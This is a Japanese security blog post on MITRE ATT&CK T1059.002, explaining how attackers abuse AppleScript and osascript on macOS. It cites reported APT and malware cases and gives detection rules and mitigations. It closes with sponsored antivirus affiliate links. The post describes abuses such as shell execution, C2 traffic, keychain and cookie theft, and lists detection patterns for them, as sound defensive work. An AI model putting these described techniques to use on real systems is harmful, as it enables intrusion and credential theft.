<h3 class="wp-block-heading"><span id="toc2">ATT&amp;CKにおける位置づけ</span></h3>



<ul class="wp-block-list">
<li><strong>戦術（Tactic）</strong>：Execution（実行）</li>
<li><strong>テクニック</strong>：T1059 Command and Scripting Interpreter</li>
<li><strong>サブテクニック</strong>：T1059.002 AppleScript</li>
<li><strong>プラットフォーム</strong>：macOS</li>
<li><strong>関連サブテクニック</strong>：<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">T1059.001 PowerShell</a>、<a href="https://ai-sec-review.com/t1059-005-visual-basic%ef%bc%88vba-vbscript%ef%bc%89%e3%82%92%e6%82%aa%e7%94%a8%e3%81%97%e3%81%9f%e6%94%bb%e6%92%83%e6%89%8b%e6%b3%95%e3%81%a8%e6%a4%9c%e7%9f%a5%e6%96%b9%e6%b3%95%e3%80%90mitre-attck/">T1059.005 Visual Basic</a></li>
</ul>



<h2 class="wp-block-heading"><span id="toc3">攻撃者がAppleScriptを悪用する理由</span></h2>



<p>AppleScriptが攻撃者にとって魅力的なツールとなる理由は複数あります。macOS環境に標準で搭載されている正規ツールであるため、いわゆる「Living off the Land（環境寄生型）」攻撃が可能です。</p>



<h3 class="wp-block-heading"><span id="toc4">osascriptコマンドの悪用</span></h3>



<p><code>osascript</code>はmacOSのコマンドラインからAppleScriptを実行するためのユーティリティです。攻撃者はこのコマンドを使って以下のような操作を実行できます。</p>



<ul class="wp-block-list">
<li><strong>シェルコマンドの実行</strong>：<code>do shell script</code>命令を使い、任意のUNIXコマンドを実行</li>
<li><strong>ファイル操作</strong>：ファイルの作成・削除・移動・コピーを自動化</li>
<li><strong>ネットワーク通信</strong>：<code>curl</code>等のコマンドをラップしてC2サーバーと通信</li>
<li><strong>GUI操作の自動化</strong>：System Eventsを利用したキーストローク送信やメニュー操作</li>
</ul>



<h3 class="wp-block-heading"><span id="toc5">IPC（プロセス間通信）機能の悪用</span></h3>



<p>AppleScriptの最大の特徴は、Apple Eventsを通じた他アプリケーションとのIPC機能です。この機能を悪用することで以下が可能になります。</p>



<ul class="wp-block-list">
<li><strong>メールアプリの操作</strong>：Mail.appを制御して機密メールの転送や添付ファイルの抽出</li>
<li><strong>ブラウザの操作</strong>：Safariのタブ操作やURLアクセス、Cookie情報の取得</li>
<li><strong>Finderの操作</strong>：ファイルシステムの探索やネットワーク共有へのアクセス</li>
<li><strong>キーチェーンへのアクセス</strong>：資格情報の窃取を試みる操作</li>
</ul>




<h2 class="wp-block-heading"><span id="toc6">実際の攻撃事例：APTグループによるAppleScript悪用</span></h2>



<p>AppleScriptの悪用は理論上の脅威ではなく、複数の高度攻撃グループ（APT）によって実際に確認されています。</p>



<h3 class="wp-block-heading"><span id="toc7">OceanLotus（APT32）</span></h3>



<p>ベトナムを拠点とするとされるAPTグループ「OceanLotus（APT32）」は、macOSを標的とした攻撃キャンペーンでAppleScriptを積極的に活用しています。同グループはmacOS向けのバックドアにAppleScriptベースのペイロードを組み込み、<code>osascript</code>経由でシステム情報の収集やC2通信を実行しました。特に東南アジア地域のジャーナリストや人権活動家を標的とした攻撃において、この手法が確認されています。</p>



<h3 class="wp-block-heading"><span id="toc8">Lazarus Group</span></h3>



<p>北朝鮮に関連するとされる「Lazarus Group」は、macOS環境への侵入後の活動でAppleScriptを利用するケースが報告されています。暗号資産関連企業を狙ったソーシャルエンジニアリング攻撃の後段階で、AppleScriptを用いた情報収集や永続化が確認されました。</p>



<h3 class="wp-block-heading"><span id="toc9">その他の事例</span></h3>



<ul class="wp-block-list">
<li><strong>Bundlore</strong>：macOS向けアドウェアがAppleScriptを使ってブラウザ拡張機能をインストール</li>
<li><strong>XCSSET</strong>：Xcodeプロジェクトを介したサプライチェーン攻撃でAppleScriptペイロードを展開</li>
<li><strong>OSX/Dok</strong>：プロキシ設定の変更にAppleScriptを使用し、中間者攻撃を実現</li>
</ul>



<h2 class="wp-block-heading"><span id="toc10">検知方法：AppleScript悪用を見抜く</span></h2>



<p>AppleScriptの悪用を効果的に検知するには、複数のレイヤーでの監視が必要です。</p>



<h3 class="wp-block-heading"><span id="toc11">プロセス監視（osascriptの実行検知）</span></h3>



<p>最も基本的な検知手法は、<code>osascript</code>プロセスの実行を監視することです。</p>



<ul class="wp-block-list">
<li><strong>osascriptの起動ログ</strong>：<code>osascript</code>が実行された日時、親プロセス、引数を記録</li>
<li><strong>異常な親プロセス</strong>：Webブラウザやメールクライアントから<code>osascript</code>が起動された場合は要注意</li>
<li><strong>コマンドライン引数の監視</strong>：<code>-e</code>オプションでインラインスクリプトが実行される場合、攻撃の可能性が高い</li>
</ul>



<h3 class="wp-block-heading"><span id="toc12">Syslog・統合ログによる監視</span></h3>



<p>macOSの統合ログ（Unified Logging System）を活用した検知も有効です。</p>



<ul class="wp-block-list">
<li><code>log show --predicate &apos;process == &quot;osascript&quot;&apos;</code> でosascript関連ログを抽出</li>
<li>Apple Eventsのログからアプリケーション間通信の異常を検知</li>
<li>TCC（Transparency, Consent, and Control）フレームワークのログで権限アクセスを監視</li>
</ul>



<h3 class="wp-block-heading"><span id="toc13">EDR（Endpoint Detection and Response）の活用</span></h3>



<p>商用EDR製品を導入している環境では、以下の検知ルールが有効です。</p>



<ul class="wp-block-list">
<li><code>osascript</code>による<code>do shell script</code>の実行パターン</li>
<li>AppleScriptからのネットワーク通信（特に外部IPへの接続）</li>
<li>System Events経由のGUI操作（キーストローク送信、スクリーンキャプチャ）</li>
<li>権限昇格を試みるAppleScriptの実行（<code>with administrator privileges</code>句の使用）</li>
</ul>



<h2 class="wp-block-heading"><span id="toc14">緩和策：AppleScript悪用を防ぐ</span></h2>



<p>AppleScriptの悪用リスクを低減するための具体的な対策を紹介します。</p>



<h3 class="wp-block-heading"><span id="toc15">macOS標準のセキュリティ機能の活用</span></h3>



<ul class="wp-block-list">
<li><strong>Gatekeeper</strong>：署名されていないアプリケーションの実行をブロック</li>
<li><strong>TCC（Transparency, Consent, and Control）</strong>：アプリケーションのアクセス許可を厳格に管理。AppleScriptによるアクセシビリティ機能の利用を制限</li>
<li><strong>SIP（System Integrity Protection）</strong>：システムファイルの改変を防止</li>
<li><strong>XProtect</strong>：既知のマルウェア署名に基づくAppleScriptペイロードの検知</li>
</ul>



<h3 class="wp-block-heading"><span id="toc16">MDM（モバイルデバイス管理）による制御</span></h3>



<ul class="wp-block-list">
<li>構成プロファイルでAppleScriptの実行を制限</li>
<li><code>osascript</code>バイナリへのアクセス制御を適用</li>
<li>許可されたスクリプトのみ実行可能なホワイトリスト方式の導入</li>
</ul>



<h3 class="wp-block-heading"><span id="toc17">運用面での対策</span></h3>



<ul class="wp-block-list">
<li><strong>最小権限の原則</strong>：ユーザーアカウントに不要な管理者権限を付与しない</li>
<li><strong>アプリケーション制御</strong>：業務に不要なスクリプティング機能を無効化</li>
<li><strong>セキュリティ意識向上</strong>：従業員に対するフィッシング対策トレーニング（AppleScript実行を促す攻撃への対処）</li>
<li><strong>定期的な監査</strong>：<code>osascript</code>の実行ログを定期的にレビュー</li>
</ul>



<h2 class="wp-block-heading"><span id="toc18">おすすめセキュリティ対策ツール</span></h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
AppleScriptを悪用したmacOS攻撃に対抗するには、信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading"><span id="toc19">まとめ</span></h2>



<p>T1059.002 AppleScriptの悪用は、macOS環境における深刻な脅威です。本記事の要点を整理します。</p>



<ul class="wp-block-list">
<li><strong>AppleScriptはmacOS標準のスクリプト言語</strong>であり、<code>osascript</code>コマンドやIPC機能を通じて攻撃者に悪用される</li>
<li><strong>OceanLotus（APT32）やLazarus Group</strong>など、実際のAPTグループがmacOS標的攻撃にAppleScriptを利用している</li>
<li><strong>検知にはosascriptプロセスの監視</strong>、統合ログの分析、EDRの活用が効果的</li>
<li><strong>TCC・Gatekeeper・SIP</strong>などmacOS標準のセキュリティ機能とMDMによる制御が緩和策の要</li>
<li><strong>最小権限の原則</strong>と定期的な監査が運用面での基本対策となる</li>
</ul>



<p>macOSは「安全なOS」という認識がありますが、AppleScriptのような正規機能が攻撃に転用される事例は増加しています。自社のmacOS環境を守るために、本記事で紹介した検知・緩和策の導入を検討してください。</p>



<h2 class="wp-block-heading"><span id="toc20">参考リンク</span></h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1059/002/" target="_blank">MITRE ATT&amp;CK T1059.002 &#8211; AppleScript（公式）</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA（情報処理推進機構）セキュリティ情報</a></li>
<li><a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a></li>
<li><a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">NISC（内閣サイバーセキュリティセンター）</a></li>
<li><a rel="noopener" href="https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html" target="_blank">Apple &#8211; AppleScript公式ガイド</a></li>
</ul>



<p>関連記事：<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 コマンドおよびスクリプトインタプリタとは？</a> | <a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">T1059.001 PowerShellを悪用した攻撃手法</a> | <a href="https://ai-sec-review.com/t1059-005-visual-basic%ef%bc%88vba-vbscript%ef%bc%89%e3%82%92%e6%82%aa%e7%94%a8%e3%81%97%e3%81%9f%e6%94%bb%e6%92%83%e6%89%8b%e6%b3%95%e3%81%a8%e6%a4%9c%e7%9f%a5%e6%96%b9%e6%b3%95%e3%80%90mitre-attck/">T1059.005 Visual Basic（VBA/VBScript）を悪用した攻撃手法</a></p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p style="color:#64748b;font-size:0.85rem">Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報は<a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE公式サイト</a>をご参照ください。</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-002-applescript/">T1059.002 AppleScriptを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-002-applescript/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
